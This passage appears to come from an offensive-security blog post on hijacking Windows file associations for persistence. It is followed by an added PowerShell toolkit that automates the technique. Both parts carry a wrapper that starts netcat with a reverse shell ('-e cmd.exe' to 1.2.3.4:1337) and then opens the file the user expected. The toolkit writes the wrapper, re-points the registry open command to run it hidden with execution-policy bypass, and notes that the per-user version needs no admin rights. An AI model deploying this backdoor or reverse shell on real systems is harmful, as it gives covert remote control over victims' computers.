Hijacking file associations is the same basic idea as hijacking shortcut files: the command that runs when the user opens a file of a given type is swapped for one that launches your payload and then the application they expected. This is a two-step process.
- Locate the "programmatic ID" (ProgID) of the extension you wish to hijack under HKLM\Software\Classes\<.ext> (it will be that key's (Default) value; .txt, for example, maps to txtfile).
- The ProgID has its own key under HKLM\Software\Classes, and the command path is the (Default) value of its shell\open\command key.

The same layout exists under HKCU\Software\Classes, which Windows merges over HKLM for that user (so a per-user hijack needs no admin rights), and Explorer prefers a ProgID recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\<.ext>\UserChoice, so check that the ProgID you edit is the one that actually fires on double-click.
Note that the ProgID's command will usually include the %1 placeholder, which Windows replaces with the path of the file being opened. This requires a slightly different script than the one used to backdoor shortcuts:
```powershell
# Create a reverse shell (note that netcat is something that
# the attacker needs to provide themselves!)
#
Start-Process -NoNewWindow "C:\Windows\System32\nc.exe" `
    "-e cmd.exe 1.2.3.4 1337"

# Fire off the application the user is expecting and pass in
# the supplied file path
#
C:\Windows\System32\notepad.exe "$args"
```
Note the quoting here, as well as the inclusion of the entire $args
array. Most of the documentation I’ve found online suggests using $args[0]
as an unquoted argument, but this approach did not work in my testing.
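As an added example (not code from the original post), here is the two-step lookup and the backdoor installation scripted end to end in PowerShell, plus a matching restore. The payload path and arguments mirror the post; the wrapper location ($env:ProgramData\assoc-wrapper.ps1), the OriginalCommand value used for restore, and the UserChoice check are my own assumptions for illustration.

```powershell
# Added example, not code from the original post. Resolves the ProgID and
# open command for an extension, writes a wrapper script that runs a payload
# and then the real handler with the file path, and re-points the command at
# the wrapper. Payload, wrapper location and the 'OriginalCommand' restore
# value are illustrative assumptions.

function Get-FileAssociation {
    param(
        [Parameter(Mandatory)][string]$Extension,   # e.g. ".txt"
        [ValidateSet('HKLM', 'HKCU')][string]$Hive = 'HKLM'
    )
    # <hive>\Software\Classes\<.ext> (Default) holds the ProgID
    $progId = (Get-ItemProperty -Path "${Hive}:\Software\Classes\$Extension" -ErrorAction Stop).'(default)'

    # <hive>\Software\Classes\<ProgID>\shell\open\command (Default) holds the command line
    $cmdKey  = "${Hive}:\Software\Classes\$progId\shell\open\command"
    $command = (Get-ItemProperty -Path $cmdKey -ErrorAction Stop).'(default)'

    # Explorer honours a per-user choice over the class registration; if it
    # names a different ProgID, editing this command will not fire on double-click.
    $choiceKey  = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\$Extension\UserChoice"
    $userChoice = (Get-ItemProperty -Path $choiceKey -ErrorAction SilentlyContinue).ProgId
    if ($userChoice -and $userChoice -ne $progId) {
        Write-Warning "UserChoice for $Extension is '$userChoice', not '$progId'"
    }

    [pscustomobject]@{
        Extension  = $Extension
        ProgId     = $progId
        CommandKey = $cmdKey
        Command    = $command
        UserChoice = $userChoice
    }
}

function Install-AssociationBackdoor {
    param(
        [Parameter(Mandatory)][string]$Extension,
        [ValidateSet('HKLM', 'HKCU')][string]$Hive = 'HKLM',
        [string]$PayloadPath = 'C:\Windows\System32\nc.exe',   # attacker-supplied, as in the post
        [string]$PayloadArgs = '-e cmd.exe 1.2.3.4 1337',
        [string]$WrapperPath = "$env:ProgramData\assoc-wrapper.ps1"   # assumption
    )
    $assoc = Get-FileAssociation -Extension $Extension -Hive $Hive
    if ($assoc.Command -like "*$WrapperPath*") {
        throw "$($assoc.CommandKey) already points at the wrapper"
    }

    # Pull the real executable out of the original command: take a quoted
    # path if there is one, otherwise everything before the %1 placeholder.
    $expanded = [Environment]::ExpandEnvironmentVariables($assoc.Command)
    if ($expanded -match '^\s*"([^"]+)"') {
        $exe = $Matches[1]
    } else {
        $exe = ($expanded -replace '"?%1"?.*$', '').Trim()
    }

    # The wrapper mirrors the post's script: payload first, then the expected
    # application with the whole (quoted) $args array, which carries the file path.
    $wrapper = @"
Start-Process -NoNewWindow "$PayloadPath" "$PayloadArgs"
& "$exe" "`$args"
"@
    Set-Content -Path $WrapperPath -Value $wrapper -Encoding ASCII

    # Keep the original command next to the key so it can be put back later
    Set-ItemProperty -Path $assoc.CommandKey -Name 'OriginalCommand' -Value $assoc.Command
    $newCommand = "powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -File `"$WrapperPath`" `"%1`""
    Set-ItemProperty -Path $assoc.CommandKey -Name '(default)' -Value $newCommand
    $newCommand
}

function Remove-AssociationBackdoor {
    param(
        [Parameter(Mandatory)][string]$Extension,
        [ValidateSet('HKLM', 'HKCU')][string]$Hive = 'HKLM'
    )
    $assoc = Get-FileAssociation -Extension $Extension -Hive $Hive
    $orig  = (Get-ItemProperty -Path $assoc.CommandKey -ErrorAction Stop).OriginalCommand
    if (-not $orig) { throw "No OriginalCommand saved under $($assoc.CommandKey)" }
    Set-ItemProperty -Path $assoc.CommandKey -Name '(default)' -Value $orig
    Remove-ItemProperty -Path $assoc.CommandKey -Name 'OriginalCommand'
}

# Usage (an elevated prompt is needed for the HKLM hive):
#   Get-FileAssociation -Extension '.txt'
#   Install-AssociationBackdoor -Extension '.txt'
#   Remove-AssociationBackdoor -Extension '.txt'
```

The wrapper is launched through powershell.exe -File with "%1" as its only argument, so inside it "$args" is the full quoted file path, exactly the form the post found to work. Writing to HKLM needs an elevated shell; passing -Hive HKCU performs the same edit on the per-user copy of the class registration, which Windows consults ahead of HKLM.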